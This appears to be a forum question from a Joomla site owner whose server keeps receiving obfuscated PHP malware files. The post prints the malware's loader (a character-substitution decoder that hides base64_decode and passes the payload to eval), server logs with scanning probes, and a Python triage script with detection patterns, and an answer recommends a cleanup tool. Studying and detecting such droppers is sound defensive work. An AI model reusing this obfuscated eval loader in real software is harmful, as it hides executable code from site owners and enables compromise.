Joomla - PHP file containing base64_decode shows up on server


My server has a hole somewhere, and I need to plug it. A PHP file containing base64-encoded code keeps showing up in my Joomla website.

I was blacklisted at first (Kelihos was the listed reason), and discovered I have a number of PHP files with random, human-friendly names (login.php, file.php, alias75.php ...) in the Joomla directory. The files had the main portion of the script after a base64_decode function. Here is an example of a listing of such a file:

-rw-r--r-- 1 www-data www-data 155232 Dec 24 18:51 file.php

Note the date and time: the night before Christmas. The same file showed up in the morning at 6 on the 24th of Dec. Can that be a clue, maybe? Here is a snippet of the actual code:

<?php
// Maps every character of $rlkr through the lookup table $fikixpq (characters not in
// the table pass through unchanged), then base64-decodes the result; the decoder's
// name is hidden in $jeb so a plain grep for base64_decode( finds nothing.
function jqgwuawwjs($rlkr, $fikixpq) {
    $wynuczq = '';
    for ($i = 0; $i < strlen($rlkr); $i++) {
        $wynuczq .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];
    }
    $jeb = "base64_decode";
    return $jeb($wynuczq);
}
$ldo = 'dgcozsrv5id3bus9xqr9iumt59xg1zcskz0ok0ouzycoipecsx'.
       'adigrdius9xqr9x9xg1puok0ouzycoipecsxadiyfhiush5ye2sgcticr6zy2cb90ayxqmxq7v5iwv'.

This continues for the next 1900 lines and ends with:

; $zmdjyoxo = array('1'=>'i', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'z', '4'=>'q', '7'=>'b', '6'=>'0', '9'=>'y', '8'=>'6', 'a'=>'k', 'c'=>'l', 'b'=>'i', 'e'=>'n', 'd'=>'n', 'g'=>'g', 'f'=>'f', 'i'=>'b', 'h'=>'4', 'k'=>'t', 'j'=>'8', 'm'=>'x', 'l'=>'l', 'o'=>'p', 'n'=>'p', 'q'=>'m', 'p'=>'d', 's'=>'v', 'r'=>'9', 'u'=>'a', 't'=>'v', 'w'=>'r', 'v'=>'z', 'y'=>'w', 'x'=>'c', 'z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'j', 'e'=>'t', 'd'=>'q', 'g'=>'s', 'f'=>'j', 'i'=>'x', 'h'=>'u', 'k'=>'o', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'y', 'u'=>'2', 't'=>'s', 'w'=>'h', 'v'=>'f', 'y'=>'m', 'x'=>'c', 'z'=>'e');
// The decoded payload is handed straight to eval().
eval(jqgwuawwjs($ldo, $zmdjyoxo));
?>

When I change eval to print, this comes out (the code is too big for the body of the message, so here is a link to pastebin):

http://pastebin.com/xcy3wqs6

I deleted these files from the server, changed the root password, MySQL password and Joomla password, and activated two-factor authentication for the Joomla administrator.

I noticed the strange behavior a month ago, but before I could investigate the problem (maybe related to this) my provider, host9, had a catastrophic failure. It left me without a website and mail server from 24 Dec 15 to 12 Jan 16 (!). Since then, I have a cron job that looks for these PHP files. Of course, deleting them resolves only half the problem. The question is how these files keep popping up?

I have a VPS with:

Ubuntu Server, Linux 3.13.0-63-generic on x86_64

Apache/2.4.7

PHP 5.5.9

Joomla 3.4.8

The file showed up after 6:00 am; I include the apache2 access.log from around that time:

61.135.190.71 - - [27/Jan/2016:22:56:31 +0000] "GET / HTTP/1.0" 200 430 "http://www.baidu.com/s?wd=www" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
208.52.154.243 - - [28/Jan/2016:01:23:44 +0000] "GET /dbadmin/scripts/setup.php HTTP/1.0" 404 458 "-" "-"
::1 - - [28/Jan/2016:02:56:54 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:56 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:43:36 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:56:03 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:11:58 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:20 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:21 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:34 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:23 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:24 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:26 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:31 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:32 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:29:28 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
78.155.39.214 - - [28/Jan/2016:07:47:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/js/messages.php?lang=en&db=&token=79eab716479466d5c44116323db94bb0 HTTP/1.1" 200 17157 "http://207.210.201.88/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/phpmyadmin.css.php?server=1&token=79eab716479466d5c44116323db94bb0&nocache=4147360344ltr HTTP/1.1" 200 17556 "http://my.ip.add.ress/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
::1 - - [28/Jan/2016:08:03:53 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:57 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:01 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:17 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:18 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"

apache2 error.log:

[Mon Jan 25 03:30:13.688765 2016] [:error] [pid 25830] [client 95.213.177.123:41264] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 03:49:23.091859 2016] [:error] [pid 4517] [client 208.52.154.243:37227] script '/var/www/moadmin.php' not found or unable to stat
[Mon Jan 25 07:40:45.016456 2016] [:error] [pid 19847] [client 95.213.177.124:38892] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 23:50:34.056409 2016] [:error] [pid 2434] [client 185.25.151.159:34885] script '/var/www/testproxy.php' not found or unable to stat
[Tue Jan 26 06:47:48.641496 2016] [:error] [pid 6043] [client 95.213.177.122:42690] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 10:58:48.569545 2016] [:error] [pid 14076] [client 95.213.177.123:32251] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 15:06:42.084295 2016] [core:error] [pid 25454] [client 169.229.3.91:42376] AH00135: Invalid method in request c'\xfdf\x9c\xd8\x02\xb9n\xfa\x8d\xc6j(\x9c\xb0\x04\xa3%
[Thu Jan 28 08:01:43.830310 2016] [mpm_prefork:notice] [pid 3932] AH00169: caught SIGTERM, shutting down
[Thu Jan 28 08:01:44.884060 2016] [mpm_prefork:notice] [pid 26468] AH00163: Apache/2.4.7 (Ubuntu) configured -- resuming normal operations
[Thu Jan 28 08:01:44.884678 2016] [core:notice] [pid 26468] AH00094: Command line: '/usr/sbin/apache2'
[Thu Jan 28 08:21:31.499215 2016] [:error] [pid 26475] [client 78.155.39.214:50308] script '/var/www/phpmyadmin.css.php' not found or unable to stat
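
As an added example (not from the question or from the tool recommended below), a Python triage script that statically undoes the substitution-then-base64 wrapper shown above and flags the tell-tale patterns, so a dropped file's payload can be read without ever running eval. The PHP text, variable names and substitution map in it are constructed samples, not the file from the question.

```python
import base64
import re
# Constructed sample, not the file from the question: a payload wrapped in the
# same scheme (char-substitution map -> base64 -> eval). Names are hypothetical.
PLAINTEXT = "<?php echo 'constructed sample payload'; ?>"
SUBST = {'a': 'k', 'k': 'a', 'Z': '3', '3': 'Z'}  # bijective, like the malware's array

def obfuscate(payload, mapping):
    """Build the blob the dropper carries: base64, then the inverse of the map."""
    inverse = {v: k for k, v in mapping.items()}
    b64 = base64.b64encode(payload.encode()).decode()
    return ''.join(inverse.get(c, c) for c in b64)

_blob = obfuscate(PLAINTEXT, SUBST)
SAMPLE_PHP = (  # same shape as the question's file, with a '.'-concatenated blob
    "<?php function f($s,$m){$o='';for($i=0;$i<strlen($s);$i++){"
    "$o.=isset($m[$s[$i]])?$m[$s[$i]]:$s[$i];}$d=\"base64_decode\";return $d($o);} "
    "$ldo = '" + _blob[:20] + "'. '" + _blob[20:] + "'; "
    "$map = array(" + ', '.join(f"'{k}'=>'{v}'" for k, v in SUBST.items()) + "); "
    "eval(f($ldo,$map));?>"
)

def extract_blob(src):
    """Longest single-quoted string (optionally '.'-concatenated) assigned to a variable."""
    cands = re.findall(r"\$\w+\s*=\s*((?:'[^']*'\s*\.?\s*)+);", src)
    return max((''.join(re.findall(r"'([^']*)'", c)) for c in cands), key=len, default='')

def extract_map(src):
    """Parse the flat array('x'=>'y', ...) literal into a dict."""
    m = re.search(r"array\((.*?)\)", src, re.S)
    return dict(re.findall(r"'(.)'\s*=>\s*'(.)'", m.group(1))) if m else {}

def recover(src):
    """Static equivalent of jqgwuawwjs(): substitute, then base64-decode.
    Nothing is executed; the result is text for an analyst to read."""
    substituted = ''.join(extract_map(src).get(c, c) for c in extract_blob(src))
    return base64.b64decode(substituted).decode(errors="replace")

# Patterns a cron job can grep for instead of relying on the random filenames.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"base64_decode"),
    "func_name_in_var": re.compile(r"\$\w+\s*=\s*[\"'](base64_decode|gzinflate|str_rot13)[\"']"),
    "char_map_array": re.compile(r"array\((?:\s*'.'\s*=>\s*'.'\s*,?){4,}"),
}

def indicators(src):
    """Names of the indicators present in a PHP source text, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))
```

Run recover() and indicators() over each file the cron job finds; a clean Joomla core file trips none of the indicators, while the dropped files trip all four.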

The code seems to be a malware script, encoded to protect it. I suggest deleting it using a program.

Try Narnia Guardian, http://github.com/pilskalns/narnia-guardian

Try the above resource to remove the encoded snippet files. It is easy to set up and easy to use as well. You need to keep patient.

